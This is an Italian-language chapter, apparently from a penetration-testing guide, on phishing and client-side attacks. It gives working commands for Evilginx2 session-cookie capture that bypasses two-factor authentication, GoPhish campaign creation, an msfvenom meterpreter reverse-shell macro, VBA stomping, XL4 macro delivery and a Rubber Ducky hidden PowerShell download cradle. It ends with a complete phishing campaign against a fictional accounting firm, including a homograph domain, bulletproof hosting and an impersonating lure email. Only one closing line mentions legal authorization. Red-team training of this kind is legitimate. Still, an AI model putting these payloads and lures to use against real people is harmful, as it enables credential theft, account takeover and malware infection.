Ingegneria sociale e vettori di attacco lato client

The Social-Engineer Toolkit: Architettura e Personalizzazione

The Social-Engineer Toolkit (SET), sviluppato da David Kennedy, rimane il framework fondamentale per l'orchestrazione di attacchi client-side all'interno di Kali Linux. La sua architettura modulare separa i vettori di attacco in componenti distinti: spear-phishing, clonazione di siti web, generazione di media infettivi e funzioni di mass-mailing. La comprensione di questa architettura consente ai professionisti di costruire scenari realistici piuttosto che affidarsi a template generici.

SET opera attraverso un'interfaccia guidata da menu, ma la sua vera potenza emerge attraverso i file di configurazione situati in /etc/setoolkit/set.config. I parametri critici includono WEB_PORT per la personalizzazione del listener, EMAIL_PROVIDER per l'integrazione con relay SMTP, e AUTO_DETECT=ON per il rilevamento automatico dell'architettura del payload. L'opzione APACHE_SERVER abilita l'integrazione senza soluzione di continuità con Apache per servire siti clonati con supporto per certificati SSL—essenziale per la credibilità.

Il modulo di spear-phishing (setoolkit → opzione 1 → opzione 2) consente la consegna di payload tramite allegati o link inline basati su template. Per la consegna tramite allegato, SET si integra con payload di Metasploit, codificando automaticamente gli eseguibili per aggirare il rilevamento naive delle firme. Il modulo di clonazione di siti web (setoolkit → opzione 1 → opzione 3) recupera i siti target tramite mirroring wget, per poi iniettare form di raccolta credenziali o keylogger JavaScript. La personalizzazione si estende alla mappatura dei campi del form: i professionisti possono definire quali campi di input attivano la cattura e specificare endpoint di esfiltrazione oltre il listener Flask predefinito di SET.

Per scenari realistici, modificare /usr/share/setoolkit/src/phishing/smtp/client/smtp_web.py per implementare header email personalizzati corrispondenti ai pattern del gateway email organizzativo. Il domain fronting attraverso servizi cloud legittimi, configurato tramite la variabile HOSTNAME, migliora ulteriormente la deliverability contro il filtraggio euristico.

Piattaforme di Campagna Phishing: Scala e Sofisticazione

Mentre SET eccelle nel prototipaggio rapido, le campagne operative richiedono piattaforme con analitiche, scheduling e collaborazione di team. Tre strumenti dominano questo spazio con filosofie architetturali distinte.

GoPhish fornisce gestione di campagna open-source con una dashboard web-based. Il suo sistema di template supporta la costruzione di email HTML/CSS con sostituzione di variabili ({{.FirstName}}, {{.TrackingURL}}). Le landing page utilizzano il motore html/template di Go, abilitando il rendering condizionale basato su user-agent o geolocalizzazione. L'API facilita l'automazione:

# Creazione di una campagna tramite API GoPhish
curl -X POST https://gophish-server:3333/api/campaigns/ \
  -H "Authorization: <api-key>" \
  -d '{
    "name": "Q1-Financial-Review",
    "template": {"name": "SharePoint Document Alert"},
    "page": {"name": "Office365-Portal-Clone"},
    "smtp": {"name": "relay.corporate-backup.net"},
    "groups": [{"name": "accounting-targets"}],
    "url": "https://secure-document-portal.net/login"
  }'

Evilginx2 opera in modo fondamentalmente diverso. A differenza delle pagine di raccolta credenziali che presentano form di login falsi, Evilginx2 funziona come reverse proxy—una distinzione architetturale critica per aggirare l'autenticazione a due fattori. Inoltra le richieste tra le vittime e i servizi legittimi, catturando i cookie di sessione in tempo reale. L'attaccante ottiene sessioni autenticate, non semplicemente password, rendendo inefficaci 2FA TOTP e notifiche push. La configurazione richiede una precisa definizione di sottodomini e phishlet:

# Phishlet Evilginx2 per Office365
phishlets hostname o365 login.microsoftonline.com
phishlets enable o365
lures create o365
lures edit 0 redirect_url https://portal.office.com
lures get-url 0

Modlishka condivide l'architettura reverse-proxy di Evilginx2 ma enfatizza l'automazione attraverso configurazione JSON. Il suo sistema di plugin abilita l'iniezione JavaScript per il pre-fetching di credenziali e la riscrittura dinamica dei contenuti. Tuttavia, lo sviluppo attivo di Evilginx2 e la sua più ampia libreria di phishlet lo rendono preferibile per la maggior parte degli engagement.

Tecniche di Attacco Macro Documenti e OLE

I documenti Microsoft Office rimangono potenti vettori di accesso iniziale, particolarmente in ambienti con filtraggio web restrittivo. Gli attacchi moderni sfruttano tre approcci tecnici con complessità e profili di rilevamento variabili.

La generazione di macro MSFVenom fornisce una capacità di base:

msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=192.168.45.200 LPORT=443 \
  -f vba -o maldoc_macro.txt

L'output incorpora shellcode all'interno di subroutine AutoOpen. Tuttavia, i template predefiniti attivano euristiche moderne AMSI (Anti-Malware Scan Interface) e application guard.

VBA Stomping elude il rilevamento delle firme manipolando la persistenza del codice sorgente del progetto VBA. I documenti Office memorizzano sia il sorgente compresso (P-code) sia il codice eseguibile compilato (EXENATIVE). VBA stomping sovrascrive il sorgente visibile con contenuto benigno preservando il P-code dannoso. Gli strumenti pcodedmp ed evilclippy automatizzano questo processo:

# Workflow VBA stomping
evilclippy -s fake_code.vba -t stomped_target.doc

Il documento risultante mostra VBA innocuo quando ispezionato ma esegue P-code dannoso al trigger. L'analisi forense richiede l'estrazione di entrambi gli stream e il confronto degli hash—un passaggio raramente eseguito nella triage automatizzata.

La Rinascita delle Macro XL4 sfrutta le macro Excel 4.0 (XLM), una funzionalità legacy precedente al VBA. XLM esegue senza le restrizioni sandbox disponibili per il VBA moderno, e i vendor di sicurezza mantengono firme di rilevamento più deboli. Strumenti come XLMMacroDeobfuscator estraggono e analizzano queste macro, mentre il payload -f exe-small di msfvenom può essere consegnato attraverso formule EXEC() che fanno riferimento a risorse remote. La rinascita riflette l'economia degli attaccanti: il supporto XLM rimane abilitato per default in Excel per compatibilità, fornendo sfruttamento a minimo attrito.

Attacchi USB Drop: Impianti Hardware

L'Hak5 Rubber Ducky e il Bash Bunny rappresentano piattaforme di attacco USB programmabili che sfruttano la fiducia nei media fisici. Questi dispositivi si enumerano come Human Interface Devices (HID), aggirando le restrizioni autorun e le policy di storage USB endpoint.

Il Rubber Ducky esegue sequenze di tasti pre-scriptate a velocità sovrumane. Il suo linguaggio Ducky Script supporta il condizionamento del payload:

REM Payload studio contabile: PowerShell download cradle
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -enc [base64-encoded-command]
ENTER

Il Bash Bunny estende questo con selezione payload tramite interruttori hardware, multiple modalità di attacco (HID, storage, Ethernet), e Bunny Script per costrutti logici. La sua modalità Ethernet abilita la manipolazione di rete attraverso servizi DHCP e DNS integrati, utile per bypass di captive portal o attacchi di relay credenziali in ambienti air-gapped.

Il posizionamento fisico massimizza i trigger psicologici: dispositivi etichettati "Q1 Financial Audit Results" o "Employee Compensation Review 2024" sfruttano l'autorità e l'urgenza. Il tracciamento di numeri di serie univoci o chip NFC integrati abilita la correlazione tra posizionamento fisico ed esecuzione riuscita.

Principi Psicologici nella Progettazione Tecnica degli Attacchi

L'ingegneria sociale efficace operazionalizza sistematicamente i bias cognitivi. Tre principi richiedono particolare attenzione durante l'architettura della campagna.

Autorità sfrutta la conformità gerarchica. Le email di phishing che impersonano CFO, revisori esterni o consulenti legali ottengono tassi di click-through più elevati rispetto alle notifiche IT generiche. L'implementazione tecnica richiede lo spoofing del display-name (CFO Sarah Chen <[email protected]>) e l'allineamento degli header con i pattern di comunicazione esecutiva estratti da depositi pubblici o presentazioni a conferenze.

Urgenza aggira l'elaborazione analitica. Le campagne che prendono di mira gli studi di contabilità durante i periodi di chiusura trimestrale, le scadenze fiscali o le finestre di audit ottengono rilevanza contestuale. La scadenza di accesso a tempo limitato ("Your DocuSign envelope expires in 4 hours") crea scarsità artificiale che richiede azione immediata.

Reciprocità sfrutta la creazione di obbligo. Strumenti gratuiti, whitepaper o "benchmark esclusivi del settore" forniti via email stabiliscono debito psicologico. La successiva richiesta di credenziali appare come scambio ragionevole piuttosto che sfruttamento.

Esempio Pratico: Campagna Phishing Studio di Contabilità

Consideriamo "Hendricks & Associates," uno studio di medie dimensioni con 340 dipendenti, in preparazione per l'audit SOC 2 Type II.

Ricognizione: LinkedIn identifica il CFO, il presidente del comitato di audit e il direttore IT. I depositi SEC rivelano l'engagement con "Preston Audit Services." Lo studio utilizza Microsoft 365 con accesso condizionale Azure AD.

Registrazione Dominio: Registrare hendricks-associates[.]net (disponibile) come primario, con variante omografo hẹndricks-associates[.]com utilizzando caratteri combinanti per target ad alto valore selezionati. Configurare SPF, DKIM e DMARC per corrispondere ai pattern di infrastruttura legittimi osservati attraverso enumerazione DNS.

Infrastruttura: Deployare Evilginx2 con phishlet personalizzato per login.microsoftonline.com, catturando cookie di sessione e reindirizzando a Office365 legittimo post-autenticazione per minimizzare i sospetti. Host su VPS bulletproof con fronting Cloudflare per la occultamento dell'origine.

Template Email:

From: Preston Audit Services <[email protected]>
Subject: AZIONE RICHIESTA: Accesso Portale Evidenze Q4

Caro {{.FirstName}},

Come parte del nostro ongoing engagement SOC 2 Type II, abbiamo 
stabilito un portale evidenze sicuro per la sottomissione dei documenti.

Le tue credenziali di accesso sono state provisionate il {{.CurrentDate}}.

[Accedi al Portale]  ← URL lure Evilginx2

Questo link scade in 48 ore in conformità con la nostra MSA Sezione 14.2. 
Per domande dirette contatta il tuo engagement manager.

Cordiali saluti,
Marcus Chen
Senior Manager, IT Risk Assurance
Preston Audit Services

Esecuzione: Caricare la lista target via API GoPhish con scheduling appropriato al fuso orario (martedì 9:30 AM locale). Abilitare il tracciamento apertura tramite pixel 1x1; le sottomissioni di credenziali attivano notifiche webhook.

Limite Legale: Questa campagna richiede autorizzazione scritta esplicita dal General Counsel di Hendricks & Associates, con scope definito, procedure di gestione dati e protocolli di notifica per esposizione credenziali. La simulazione non autorizzata costituisce wire fraud e violazione del Computer Fraud and Abuse Act.